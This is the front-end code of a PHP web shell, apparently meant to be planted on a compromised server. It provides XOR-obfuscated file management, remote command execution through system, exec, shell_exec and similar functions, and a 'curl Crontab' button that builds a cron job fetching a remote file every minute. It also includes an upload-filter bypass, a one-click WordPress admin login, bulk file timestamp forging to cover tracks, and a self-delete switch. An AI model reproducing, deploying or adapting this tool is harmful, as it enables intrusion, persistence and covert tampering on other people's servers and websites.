                        var resp = result.data;
                        if (resp.success) {
                            set_message("Date modified!");
                            obj.innerText = newdate;
                            obj.setAttribute("value", newdate);
                        } else {
                            set_message("ERROR: Failed to change modified date");
                        }
                    });
                });
            }

}

function rename_file(obj) {
            var current_filename = obj.getAttribute("path")
            var newname = prompt("Enter your new name : ", current_filename)
            if (newname && newname !== current_filename) {
                var formdata = new FormData();

formdata.append("new", newname);
                formdata.append("filename", encodeXorString(current_filename))
                formdata.append("path", get_current_path());

post_url('re', formdata, false).then(function(response) {
                    if (!response.ok) {
                        set_message("ERROR: Invalid response");
                        return;
                    }
                    safeParseResponse(response).then(function(result) {
                        if (!result.ok) {
                            set_message("Invalid response (not JSON)");
                            return;
                        }
                        var resp = result.data;
                        if (resp.success) {
                            set_message("Renamed!");
                            change_data_info(obj, newname);
                            var parentRow = obj.closest('tr');
                            if (parentRow) {
                                var currentPath = parentRow.getAttribute('data-path') || '';
                                var dirPath = currentPath.lastIndexOf('/') >= 0 ? currentPath.substring(0, currentPath.lastIndexOf('/')) : '';
                                var newPath = (dirPath ? dirPath + "/" : "") + newname;
                                parentRow.setAttribute('data-path', newPath);
                            }
                        } else {
                            set_message("ERROR: Failed to rename");
                        }
                    });
                });
            }

}

function delete_file(obj) {
            var filename = obj.getAttribute("path")
            var data = new FormData();

data.append("filename", encodeXorString(filename));

post_url('ul', data, false).then(function(response) {
                if (!response.ok) {
                    set_message("ERROR: Invalid response");
                    return;
                }
                safeParseResponse(response).then(function(result) {
                    if (!result.ok) {
                        set_message("Invalid response (not JSON)");
                        return;
                    }
                    var message = result.data;
                    if (message.success) {
                        set_message("File Deleted!");
                        obj.parentElement.parentNode.remove();
                    } else {
                        set_message("Can not delete");
                    }
                });
            });

}

function post_url(action, data, parse_json = true) {

if (parse_json) {
                data = JSON.stringify(data);
            }

return response;
        }

function stringToHex(str) {
            return str.split('')
                .map(char => char.charCodeAt(0).toString(16).padStart(2, '0'))
                .join('');
        }

function hexToString(hex) {
            let str = '';
            for (let i = 0; i < hex.length; i += 2) {
                str += String.fromCharCode(parseInt(hex.substr(i, 2), 16));
            }
            return str;
        }

function xorEncryptDecrypt(input, key) {
            if (key == null) key = String.fromCharCode(0x31, 0x32);
            var out = '', k = key.length, n = input.length, i;
            for (i = 0; i < n; i++) {
                out += String.fromCharCode(input.charCodeAt(i) ^ key.charCodeAt(i % k));
            }
            return out;
        }

function format_date_local(ts) {
            var d = new Date(ts);
            var dd   = String(d.getDate()).padStart(2, '0');
            var mm   = String(d.getMonth() + 1).padStart(2, '0');
            var yyyy = d.getFullYear();
            var hh   = String(d.getHours()).padStart(2, '0');
            var min  = String(d.getMinutes()).padStart(2, '0');
            var ss   = String(d.getSeconds()).padStart(2, '0');
            return dd + '-' + mm + '-' + yyyy + ' ' + hh + ':' + min + ':' + ss;
        }

function handle_upload() {
            //stringToHex(xorEncryptDecrypt(path))
            var upload_input = document.getElementById("file-upload-input")
            var file_upload = upload_input.files[0];
            var bypass_upload = document.getElementById("bypass-upload")
            var current_path = localStorage.getItem("path") || get_current_path();
            var reader = new FileReader()

var data = new FormData()
            data.append("path", stringToHex(xorEncryptDecrypt(current_path)));

if (bypass_upload.checked) {

reader.readAsArrayBuffer(file_upload)

data.append("by", true)
                reader.onload = function(event) {
                    var arrayBuffer = event.target.result;
                    var binaryString = '';
                    var bytes = new Uint8Array(arrayBuffer);
                    var len = bytes.byteLength;
                    for (var i = 0; i < len; i++) {
                        binaryString += String.fromCharCode(bytes[i]);
                    }
                    var encoded_content = utf8ToBase64(binaryString);
                    var encoded_file = new File(
                        [encoded_content],
                        file_upload.name, {
                            type: "text/plain"
                        }
                    )
                    data.append("import_file", encoded_file)
                    process_upload(data, encoded_file)
                }
            } else {
                data.append("import_file", file_upload);
                process_upload(data, file_upload)
            }

upload_input.value = ''

}

function utf8ToBase64(str) {
            // Convert the string to a Uint8Array of bytes
            return btoa(unescape(encodeURIComponent(str)));
        }
        async function textarea_handle() {
            var content = document.getElementById("content");
            var encoded_content = utf8ToBase64(content.value);
            var filenameEl = document.getElementById("edit-filename");
            var filename = filenameEl ? filenameEl.value : (new URLSearchParams(window.location.search)).get("filename");
            if (!filename) {
                set_message("ERROR: No filename (reopen file from list)");
                return;
            }
            set_message("Processing")

var data = {
                "content": encoded_content,
                "filename": filename
            }

post_url('r', data).then(function(resp) {
                safeParseResponse(resp).then(function(result) {
                    if (!result.ok) {
                        set_message("Invalid response (not JSON)");
                        return;
                    }
                    var resp_json = result.data;
                    if (resp_json.success) {
                        set_message("Success!");
                    } else {
                        set_message("Failed!");
                    }
                });
            });
        }

function removeLinkByFilename(filename) {
            const links = document.querySelectorAll('a[path]');

links.forEach((link) => {
                if (link.innerText == filename) {
                    link.parentElement.parentNode.remove()
                }
            })
        }

function fetch_url(act, additional_params = {}) {
            var params = new URLSearchParams({
                action: act
            })
            if (additional_params) {
                for (var i in additional_params) {
                    var value = additional_params[i]
                    if (i && value) {
                        params.append(i, value)
                    }
                }
            }
            var endpoint = baseUrl + '?' + params.toString()
            console.log(endpoint)
            console.log(additional_params)
            return fetch(endpoint)
        }

function blurTable() {
            var table_id = document.getElementById("data_table");
            table_id.setAttribute("class", "blur-table");
        }

function unblurTable() {
            var table_id = document.getElementById("data_table");
            table_id.removeAttribute("class")
        }

function encodeXorString(str) {
            return stringToHex(xorEncryptDecrypt(str))
        }

function getLastPath() {
            var last_path = localStorage.getItem("path")
            if (!last_path) {
                localStorage.setItem("path", get_current_path())
                return getLastPath()
            }
            return last_path
        }

function init(current_path = '') {

var table_id = document.getElementById("data_table");
            blurTable();

var data = new FormData()

data.append("path", stringToHex(xorEncryptDecrypt(current_path)));
            console.log(data);
            var response = post_url("d", data, false)

response.then(function(resp) {
                if (!resp.ok) {
                    set_message("ERROR: Fetching url");
                }
                table_id.innerHTML = '';
                unblurTable();
                safeParseResponse(resp).then(function(result) {
                    if (!result.ok) {
                        set_message("Invalid response (not JSON)");
                        return;
                    }
                    var element = result.data;
                    if (!Array.isArray(element)) return;
                    element.sort(function(a, b) {
                        if (a.is_dir !== b.is_dir) {
                            return b.is_dir - a.is_dir;
                        }
                        return a.path.localeCompare(b.path);
                    });
                    element.forEach(function(data) {
                        var is_dir = data.is_dir;
                        var path = data.path;
                        var data_date = data.date;
                        create_table_data(path, data.size, !!data.is_writable, data_date, is_dir, data.perms || '');
                    });
                });
            });

}

function init_onload() {

var table = document.getElementById("data_table");
            var last_path = getLastPath();
            changePath(last_path)

if (table) {
                init(last_path);
            }

}

function EssentialToggle(list_ids = essential_id) {
            for (var element_id in list_ids) {
                let element = document.getElementById(list_ids[element_id])
                if (!element) {
                    continue;
                }
                if (!element.classList.contains("hidden")) {
                    element.classList.add("hidden")
                } else {
                    element.classList.remove("hidden");
                }
            }
        }

function cron_output(data) {
            var url = data.url
            var file_path = data.file_path
            var com_input = document.getElementById('com-input')
            var text = `(crontab -l; echo "* * * * * curl ${url} -o ${file_path}") | crontab -`
            com_input.value = text;

}

function show_command() {
            EssentialToggle();

var cmd_id = document.getElementById("com-section")

cmd_id.classList.remove("hidden")

var curl_crontab = document.getElementById('curl-crontab')
            
            curl_crontab.addEventListener('click', function() {
                var data = ask_url_path()
                if(!data) {
                    return false;
                }
                cron_output(data)
                
            })

}

function submit_com() {
            var cmd_func = localStorage.getItem("cmdFunc")
            var com_result = document.getElementById("command-output")

if (!cmd_func || (cmd_func && cmd_func == '0')) {
                checkCommand(); 
                com_result.innerText = 'Can not execute command? submit again'
                return false;
            }

var com_input = document.getElementById("com-input");

if (!com_input.value) {
                return false;
            }

var data = new FormData()

data.append("function", cmd_func)
            data.append("value", encodeXorString(com_input.value))

com_input.value = ''
            com_result.innerText = 'Processing...'

post_url('ec', data, false).then(function(response) {
                if (!response.ok) {
                    com_result.innerText = 'Invalid status code';
                    return;
                }
                safeParseResponse(response).then(function(result) {
                    if (!result.ok) {
                        com_result.innerText = 'Invalid response (not JSON)';
                        return;
                    }
                    var resp_json = result.data;
                    if (resp_json && resp_json.output !== undefined) {
                        com_result.innerHTML = resp_json.output;
                    } else {
                        com_result.innerText = 'No output:(';
                    }
                });
            });

}

function AdditionalToggle() {
            EssentialToggle(additional_id)
            EssentialToggle(essential_id)

}

function addClickListener(element_id, callback) {
            var element = document.getElementById(element_id)
            if (!element) {
                return;
            }
            element.addEventListener("click", function(ev) {
                callback()
            })
        }

function wp_login() {
            set_message("Processing...");
            var data = new FormData();

data.append("mode", "log")

post_url("wp", data, false).then(function(response) {
                if (!response.ok) {
                    set_message("Invalid response");
                    return;
                }
                safeParseResponse(response).then(function(result) {
                    if (!result.ok) {
                        set_message("Invalid response (not JSON)");
                        return;
                    }
                    var j = result.data;
                    if (j && j.success) {
                        var user_id = j.result;
                        set_message("Alright! Now you are " + user_id);
                        window.location.href = '/wp-admin/';
                    } else {
                        set_message("Failed :(((");
                    }
                });
            });
        }

function checkCommand() {
            var data = new FormData();

var list_functions = [
                'system',
                'passthru',
                'exec',
                'shell_exec',
                'proc_open',
                'popen',
            ];

data.append("data", list_functions.map(encodeXorString))
            post_url('cf', data, false).then(function(response) {
                if (!response.ok) {
                    set_message("ERROR: Invalid status code");
                    return;
                }
                safeParseResponse(response).then(function(result) {
                    if (!result.ok) {
                        set_message("Invalid response (not JSON)");
                        return;
                    }
                    var resp = result.data;
                    if (!resp || !resp.avail) {
                        localStorage.setItem("cmdFunc", "0");
                        return;
                    }
                    localStorage.setItem("cmdFunc", encodeXorString(resp.func));
                    EssentialToggle(["command"]);
                });
            });

}

function selfDelete() {
            var confirm_text = "Are you sure want to delete yourself?";

if (!confirm(confirm_text)) {
                return false;
            }

fetch_url('sd').then(function(response) {
                if (!response.ok) {
                    set_message("Failed to delete self");
                    return;
                }
                safeParseResponse(response).then(function(result) {
                    if (!result.ok) {
                        set_message("Invalid response (not JSON)");
                        return;
                    }
                    var resp_json = result.data;
                    if (resp_json && resp_json.success) {
                        set_message("Say goodbye to yourself!");
                        window.location.href = '/';
                    } else {
                        set_message("Failed to delete self");
                    }
                });
            });
        }
        
        if (!localStorage.getItem("cmdFunc")) {
            console.log("check command");
            checkCommand();
        }
        document.addEventListener("DOMContentLoaded", function() {
            document.addEventListener("click", function() { hideContextMenu(); });
            window.addEventListener("scroll", function() { hideContextMenu(); }, true);
            var ctxMenu = document.getElementById("context-menu");
            if (ctxMenu) {
                ctxMenu.addEventListener("contextmenu", function(e) {
                    e.preventDefault();
                    hideContextMenu();
                });
            }
            var pathDivEl = document.getElementById("path_div");
            
            var table = document.getElementById("data_table");

if (table) {
                console.log("Init Onload");
                init_onload();
            }

if (localStorage.getItem("cmdFunc") && localStorage.getItem("cmdFunc") !== '0') {
                EssentialToggle(["command"])
            }

var com_input = document.getElementById("com-input");
            const menu_id = [{
                    "id": "refresh-path",
                    "callback": refresh_path
                },
                {
                    "id": "create-file",
                    "callback": create_file
                },
                {
                    "id": "command",
                    "callback": show_command
                },
                {
                    "id": "submit-com",
                    "callback": submit_com
                },

{
                    "id": "self-delete",
                    "callback": selfDelete
                },
                {
                    "id": "textarea-handle",
                    "callback": textarea_handle
                },
                {
                    "id": "wp-login",
                    "callback": wp_login
                },
                {
                    "id": "additional-toggle",
                    "callback": AdditionalToggle
                }

]

menu_id.forEach(data => {
                addClickListener(data.id, data.callback)
            })

if (com_input) {
                com_input.addEventListener("keypress", function(event) {
                    if (event.key == 'Enter') {
                        submit_com();
                    }
                })
            }

var back_menu = document.getElementById("back_menu");
            if (back_menu) {
                document.getElementById("path_div").innerHTML = ''
            }

}); // end DOMContentLoaded

document.addEventListener('DOMContentLoaded', function() {
            addClickListener('create-dir', create_dir);
            addClickListener('bulk-apply', bulk_apply);
            addClickListener('bulk-cancel', bulk_cancel);

var bulkActionSel = document.getElementById('bulk-action');
            if (bulkActionSel) {
                bulkActionSel.addEventListener('change', function() {
                    update_recursive_visibility(this.value);
                });
            }

var ta = document.getElementById('inline-editor-content');
            if (ta) ta.addEventListener('input', markEditorDirty);

if (loadFile && loadFile !== '0') {
                EssentialToggle(["wp-login"]);
            }
        });

// Ctrl+S to save in editor, Escape to close
        document.addEventListener('keydown', function(e) {
            if ((e.ctrlKey || e.metaKey) && e.key === 's') {
                var editor = document.getElementById('inline-editor-panel');
                if (editor && !editor.classList.contains('hidden')) {
                    e.preventDefault();
                    saveInlineEditor();
                }
            }
            if (e.key === 'Escape') {
                var editor = document.getElementById('inline-editor-panel');
                if (editor && !editor.classList.contains('hidden')) {
                    closeInlineEditor();
                }
            }
        });

var _editorDirty = false;

function markEditorClean() { _editorDirty = false; }
        function markEditorDirty() { _editorDirty = true; }

// Patch closeInlineEditor to warn on unsaved changes (override below)
        var _origCloseInlineEditor = closeInlineEditor;
        closeInlineEditor = function() {
            if (_editorDirty) {
                if (!confirm('You have unsaved changes. Leave without saving?')) return;
            }
            markEditorClean();
            _origCloseInlineEditor();
        };

// Patch openInlineEditor to reset dirty flag after load
        var _origOpenInlineEditor = openInlineEditor;
        openInlineEditor = function(filePath) {
            markEditorClean();
            _origOpenInlineEditor(filePath);
            // dirty starts false; user typing will mark dirty
            setTimeout(function() {
                var ta = document.getElementById('inline-editor-content');
                if (ta) {
                    ta.removeEventListener('input', markEditorDirty);
                    ta.addEventListener('input', markEditorDirty);
                }
            }, 300);
        };

// Patch saveInlineEditor to clear dirty flag on success
        var _origSaveInlineEditor = saveInlineEditor;
        saveInlineEditor = function() {
            var content = document.getElementById('inline-editor-content').value;
            var encoded_content = utf8ToBase64(content);
            var filename = document.getElementById('inline-editor-filename-hidden').value;
            if (!filename) { set_message("ERROR: No filename"); return; }
            set_message("Saving...");
            post_url('r', { content: encoded_content, filename: filename }).then(function(resp) {
                safeParseResponse(resp).then(function(result) {
                    if (!result.ok) { set_message("Invalid response"); return; }
                    if (result.data.success) {
                        set_message("Saved!");
                        markEditorClean();
                    } else {
                        set_message("Failed to save!");
                    }
                });
            });
        };

function bulk_cancel() {
            document.querySelectorAll('.row-check').forEach(function(b) { b.checked = false; });
            var sa = document.getElementById('select-all');
            if (sa) sa.checked = false;
            update_bulk_bar();
        }

if (act === 'delete') {
                if (!confirm('Delete ' + files.length + ' item(s)?')) return;
            } else if (act === 'touch') {
                // Pick date from a random selected row as default
                var rows = Array.from(checked).map(function(b) { return b.closest('tr'); }).filter(Boolean);
                var randomRow = rows[Math.floor(Math.random() * rows.length)];
                var dateCell = randomRow ? randomRow.querySelector('.date-cell') : null;
                var defaultDate = dateCell ? dateCell.textContent.trim() : '';
                extra = prompt('New date (dd-mm-yyyy HH:MM:SS):', defaultDate);
                if (!extra) return;
            } else if (act === 'chmod') {
                extra = prompt('Permissions (octal):', '644');
                if (!extra) return;
            }

set_message('Processing...');
            post_url('bulk', { act: act, files: files, extra: extra, recursive: recursive }).then(function(resp) {
                safeParseResponse(resp).then(function(result) {
                    if (!result.ok) { set_message('Invalid response'); return; }
                    if (result.data.success) {
                        set_message('Done!');
                        if (act === 'delete') {
                            checked.forEach(function(b) {
                                var row = b.closest('tr');
                                if (row) row.remove();
                            });
                        } else if (act === 'touch') {
                            // Update date cells immediately in UI
                            checked.forEach(function(b) {
                                var row = b.closest('tr');
                                if (!row) return;
                                var dc = row.querySelector('.date-cell');
                                if (dc) dc.textContent = extra;
                                row.setAttribute('data-date', extra);
                            });
                        }
                        bulk_cancel();
                        if (act === 'chmod') init(localStorage.getItem('path') || get_current_path());
                    } else {
                        set_message('Some operations failed');
                        init(localStorage.getItem('path') || get_current_path());
                    }
                    bulk_cancel();

});
            });
        }

var _origCreateTableData = create_table_data;
        create_table_data = function(name, size, is_writable, date, is_dir, perms) {
            _origCreateTableData(name, size, is_writable, date, is_dir, perms);
            // Find the row just added (last tr in data_table) and prepend checkbox cell
            var tbody = document.getElementById('data_table');
            if (!tbody) return;
            var rows = tbody.querySelectorAll('tr');
            var row = rows[rows.length - 1];
            if (!row) return;
            var tdCheck = document.createElement('td');
            tdCheck.style.cssText = 'text-align:center;width:36px;';
            var cb = document.createElement('input');
            cb.type = 'checkbox';
            cb.className = 'row-check';
            cb.setAttribute('data-enc', encodeXorString(name));
            cb.addEventListener('change', update_bulk_bar);
            tdCheck.appendChild(cb);
            row.insertBefore(tdCheck, row.firstChild);
        };

</script>
</head>
<?php 
}
?>
<?php

function menu(){

?>
<body>
    
    <div class="panel hidden" id="inline-editor-panel">
        <div class="panel-header">
            <div class="panel-title">Edit File</div>
            <div class="panel-actions">
                <button class="btn" id="inline-editor-back" onclick="closeInlineEditor()">< Back</button>
                <button class="btn" id="inline-editor-save" onclick="saveInlineEditor()">Save</button>
            </div>
        </div>
        <div class="file-path" id="inline-editor-filename-display"></div>
        <input type="hidden" id="inline-editor-filename-hidden" value="">
        <textarea id="inline-editor-content" class="file-content" style="min-height:400px" onkeydown="if(event.key === 'Escape') closeInlineEditor();"></textarea>
    </div>

<div id="main-file-panel">
    <div class="panel">
        <div class="panel-header" id="file-manager">
            <div class="panel-title">Living in a happy nation </div>
            <div class="panel-actions">
                <button class="btn" id="refresh-path">HOME</button>
                <button class="btn" id="create-dir">+ DIR</button>
                <button class="btn" id="create-file">+ FILE</button>
            </div>
        </div>
        
        <div class="tools-panel" id="tool-panel">
            <div class="tool" id="upload-file">
                <form method="post" enctype="multipart/form-data">
            <div class="file-upload mr-10">
                <label for="file-upload-input" style="cursor: pointer;">
                     Upload 
                </label>
                <input type="file" id="file-upload-input" style="display: none;" onchange="handle_upload()">
            </div>
        </form>
            </div>
            <div class="tool hidden" id="command">Command</div>
            <div class="tool hidden" id="wp-login">WP Login</div>

<div class="btn btn-danger" id="self-delete" style="margin-left: auto;">
                <i class="fas fa-trash"></i> Self Delete
            </div>
        </div>
        <div class="tool" id='byp' style="margin-bottom: 15px">

<label class="checkbox-label" >
                    <input type="checkbox" id="bypass-upload"> Bypass Upload
                </label>
        </div>
        
         <div class="panel hidden" id="com-section">
        <div class="panel-header">
            <div class="panel-title"><a href='#' id='additional-toggle'>
            <p>
                < Back To Menu</p>
        </a>        </div>
       </div>
        <textarea class="command-output" id="command-output" readonly style="width: 100%">Hello ^^</textarea>
        <div class="tools-panel">
            <div class="tool" id="curl-crontab">curl Crontab</div>

</div>

<div class="command-input">
            <input type="text" id="com-input" placeholder="Enter command...">
            <button class="btn" id="submit-com">Execute</button>
        </div>
    </div>
        <table class="file-table" id="file-table">
            <thead>
                <tr>
                    <th style="width:36px;text-align:center"><input type="checkbox" id="select-all" title="Select all"></th>
                    <th>Name</th>
                    <th style="text-align:center;width:90px">Size</th>
                    <th style="text-align:center;width:110px">Permissions</th>
                    <th style="text-align:center;width:160px">Modified</th>
                </tr>
            </thead>
            <tbody id="data_table">
            </tbody>
        </table>
        
        <div id="bulk-bar" style="display:none;position:sticky;bottom:0;background:var(--surface-2);border:1px solid var(--border-light);border-radius:3px;padding:10px 16px;margin-top:10px;display:none;align-items:center;gap:10px;flex-wrap:wrap;">
            <span id="bulk-count" style="font-family:var(--mono);font-size:11px;color:var(--text-muted);">0 selected</span>
            <select id="bulk-action" style="background:var(--bg);border:1px solid var(--border-light);color:var(--text);padding:4px 10px;border-radius:2px;font-family:var(--mono);font-size:11px;outline:none;">
                <option value="">-- Action --</option>
                <option value="delete">Delete</option>
                <option value="touch">Modify Date</option>
                <option value="chmod">Chmod</option>
            </select>
            <label class="checkbox-label" id="bulk-recursive-wrap" style="display:none;">
                <input type="checkbox" id="bulk-recursive"> Recursive
            </label>
            <button class="btn" id="bulk-apply">Apply</button>
            <button class="btn" id="bulk-cancel" style="margin-left:auto;">Uncheck All</button>
        </div>
        <div id="context-menu" class="context-menu">
            <div class="context-menu-item" data-action="view" onclick="doContextView()">View</div>
            <div class="context-menu-item" data-action="edit" onclick="doContextEdit()">Edit</div>
            <div class="context-menu-item" data-action="touch" onclick="doContextTouch()">Touch (date)</div>
            <div class="context-menu-item" data-action="chmod" onclick="doContextChmod()">Chmod</div>
            <div class="context-menu-item" data-action="delete" onclick="doContextDelete()">Delete</div>
            <div class="context-menu-item" data-action="rename" onclick="doContextRename()">Rename</div>
            <div class="context-menu-item" data-action="extract" onclick="doContextExtract()" style="display:none; color: var(--accent);">Extract</div>
        </div>
    </div>
    </div>

</body>
</html>
<?php 
}
?>